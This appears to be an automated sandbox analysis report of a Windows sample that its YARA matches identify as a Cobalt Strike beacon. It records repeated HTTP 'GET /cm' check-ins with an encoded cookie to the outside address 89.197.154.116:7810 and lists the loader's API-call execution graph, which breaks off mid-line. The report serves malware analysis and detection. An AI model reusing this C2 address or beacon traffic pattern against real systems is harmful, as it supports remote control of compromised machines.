                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                112192.168.2.45011689.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:31.365053892 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                113192.168.2.45011789.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:33.051806927 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                114192.168.2.45011889.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:35.036241055 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                115192.168.2.45011989.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:36.776012897 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                116192.168.2.45012089.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:38.489892960 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                117192.168.2.45012189.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:40.176038027 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                118192.168.2.45012289.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:41.914148092 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                119192.168.2.45012389.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:43.614250898 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                120192.168.2.45012489.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:45.908759117 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                121192.168.2.45012589.197.154.11678105480C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:47.733508110 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                122192.168.2.45012689.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:49.411884069 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                123192.168.2.45012789.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:51.247157097 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                124192.168.2.45012889.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:52.929528952 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                125192.168.2.45012989.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:54.615895987 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                126192.168.2.45013089.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:56.536883116 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                127192.168.2.45013189.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:03:58.254662991 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                128192.168.2.45013289.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:04:00.034507990 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                129192.168.2.45013389.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:04:01.973644018 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                130192.168.2.45013489.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:04:03.708085060 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                131192.168.2.45013589.197.154.1167810
                                                                TimestampBytes transferredDirectionData
                                                                Oct 7, 2024 22:04:07.832915068 CEST383OUTGET /cm HTTP/1.1
                                                                Accept: */*
                                                                Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ=
                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE)
                                                                Host: 89.197.154.116:7810
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:16:00:00
                                                                Start date:07/10/2024
                                                                Path:C:\Users\user\Desktop\P3KxDOMmD3.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\P3KxDOMmD3.exe"
                                                                Imagebase:0x400000
                                                                File size:328'704 bytes
                                                                MD5 hash:B079E06CA60CF07B35ABD19E225D3E1C
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                                • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                                • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:false

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:1.9%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:11.3%
                                                                  Total number of Nodes:319
                                                                  Total number of Limit Nodes:19
                                                                  execution_graph 37297 4014c0 37302 401990 37297->37302 37299 4014d6 37306 401180 37299->37306 37301 4014db 37303 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 37302->37303 37304 4019b9 37302->37304 37305 401a2b 37303->37305 37304->37299 37305->37299 37307 401460 GetStartupInfoA 37306->37307 37308 4011b4 37306->37308 37314 4013b4 37307->37314 37309 4011e1 Sleep 37308->37309 37310 4011f6 37308->37310 37309->37308 37311 401229 37310->37311 37312 40142c _initterm 37310->37312 37310->37314 37324 401fd0 37311->37324 37312->37311 37314->37301 37315 401251 SetUnhandledExceptionFilter 37344 4024e0 37315->37344 37317 40130e malloc 37319 401335 37317->37319 37320 40137b 37317->37320 37318 40126d 37318->37317 37321 401340 strlen malloc memcpy 37319->37321 37350 403040 37320->37350 37321->37321 37322 401376 37321->37322 37322->37320 37329 402008 37324->37329 37343 401ff2 37324->37343 37325 402240 37327 40223a 37325->37327 37325->37343 37326 4021ce 37331 40228c 37326->37331 37355 401dc0 8 API calls 37326->37355 37327->37325 37327->37331 37357 401dc0 8 API calls 37327->37357 37328 4022a8 37359 401d50 8 API calls 37328->37359 37329->37325 37329->37326 37329->37328 37339 4020b0 37329->37339 37329->37343 37358 401d50 8 API calls 37331->37358 37333 402208 37356 401dc0 8 API calls 37333->37356 37337 401dc0 8 API calls 37337->37339 37338 4022b4 37338->37315 37339->37326 37339->37331 37339->37333 37339->37337 37340 402156 37339->37340 37341 402160 37339->37341 37340->37341 37342 402192 VirtualProtect 37341->37342 37341->37343 37342->37341 37343->37315 37346 4024ef 37344->37346 37345 40251c 37345->37318 37346->37345 37360 402a80 strncmp 37346->37360 37348 402517 37348->37345 37349 4025c5 RtlAddFunctionTable 37348->37349 37349->37345 37351 40304a 37350->37351 37361 4017f8 GetTickCount 37351->37361 37354 403058 SleepEx 37354->37354 37355->37333 37356->37327 37357->37327 37358->37328 37359->37338 37360->37348 37362 402e28 37361->37362 37363 401866 CreateThread 37362->37363 37364 4017a6 malloc 37363->37364 37379 4016e6 37363->37379 37365 4017c8 SleepEx 37364->37365 37371 401704 CreateFileA 37365->37371 37368 4017de 37376 401595 VirtualAlloc 37368->37376 37370 4017ed 37370->37354 37372 40179c 37371->37372 37373 40175e 37371->37373 37372->37365 37372->37368 37374 401781 CloseHandle 37373->37374 37375 401762 ReadFile 37373->37375 37374->37372 37375->37373 37375->37374 37377 4015c7 37376->37377 37378 4015e8 VirtualProtect CreateThread 37377->37378 37378->37370 37382 401630 CreateNamedPipeA 37379->37382 37383 4016dc 37382->37383 37384 40168f ConnectNamedPipe 37382->37384 37384->37383 37385 4016a3 37384->37385 37386 4016c6 CloseHandle 37385->37386 37387 4016a7 WriteFile 37385->37387 37386->37383 37387->37386 37388 4016d1 37387->37388 37388->37385 37389 681b48 37390 681b64 37389->37390 37392 681b69 37389->37392 37403 6892d0 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 37390->37403 37393 681bf4 37392->37393 37400 681bbe 37392->37400 37404 6819e8 118 API calls 16 library calls 37392->37404 37393->37400 37405 6793e0 37393->37405 37395 681c12 37396 681c3b 37395->37396 37399 6793e0 _DllMainCRTStartup 205 API calls 37395->37399 37396->37400 37421 6819e8 118 API calls 16 library calls 37396->37421 37401 681c2e 37399->37401 37420 6819e8 118 API calls 16 library calls 37401->37420 37403->37392 37404->37393 37406 6794bb 37405->37406 37409 679402 _DllMainCRTStartup 37405->37409 37489 67b47c 37406->37489 37408 679407 _DllMainCRTStartup 37408->37395 37409->37408 37419 679465 _DllMainCRTStartup 37409->37419 37506 67d4d8 GetCurrentProcess GetCurrentProcess _RTC_GetSrcLine _DllMainCRTStartup 37409->37506 37412 679448 37413 679457 37412->37413 37414 67949f 37412->37414 37412->37419 37413->37419 37507 67d2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37413->37507 37414->37419 37509 67d134 GetCurrentProcess GetCurrentProcess _DllMainCRTStartup 37414->37509 37417 679487 37417->37419 37508 67d2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37417->37508 37422 66ca74 37419->37422 37420->37396 37421->37400 37510 675fec 37422->37510 37424 66ca92 _DllMainCRTStartup 37517 67f284 37424->37517 37426 66cb40 _DllMainCRTStartup 37534 67c230 37426->37534 37432 66cbb5 37433 67eaa8 _DllMainCRTStartup 41 API calls 37432->37433 37434 66cbcf 37433->37434 37559 66f3c0 37434->37559 37437 66cbd8 37621 67da74 20 API calls 2 library calls 37437->37621 37439 66cbdd _DllMainCRTStartup 37440 66cbf4 37439->37440 37441 66cbf9 37439->37441 37622 67da74 20 API calls 2 library calls 37440->37622 37564 66f1f8 37441->37564 37445 66cc0e 37570 66f274 37445->37570 37446 66cc09 37623 67da74 20 API calls 2 library calls 37446->37623 37450 66cc17 37624 67da74 20 API calls 2 library calls 37450->37624 37452 66cc1c _DllMainCRTStartup 37453 67f284 malloc 38 API calls 37452->37453 37454 66cc4f 37453->37454 37455 66cc57 37454->37455 37456 66cc5c _DllMainCRTStartup 37454->37456 37625 67da74 20 API calls 2 library calls 37455->37625 37458 67eaa8 _DllMainCRTStartup 41 API calls 37456->37458 37459 66cc78 _DllMainCRTStartup 37458->37459 37582 675c60 GetACP 37459->37582 37490 675fec _DllMainCRTStartup 38 API calls 37489->37490 37491 67b4a0 _vsnprintf_helper _DllMainCRTStartup 37490->37491 37492 67f284 malloc 38 API calls 37491->37492 37493 67b52d _vsnprintf_helper 37492->37493 37494 67eaa8 _DllMainCRTStartup 41 API calls 37493->37494 37495 67b55e _DllMainCRTStartup 37494->37495 37497 67b575 _DllMainCRTStartup 37495->37497 37751 66f014 37495->37751 37498 67b611 GetComputerNameA 37497->37498 37501 67b634 GetPdbDllFromInstallPath _DllMainCRTStartup 37497->37501 37755 67baa8 _DllMainCRTStartup 37498->37755 37503 67f284 malloc 38 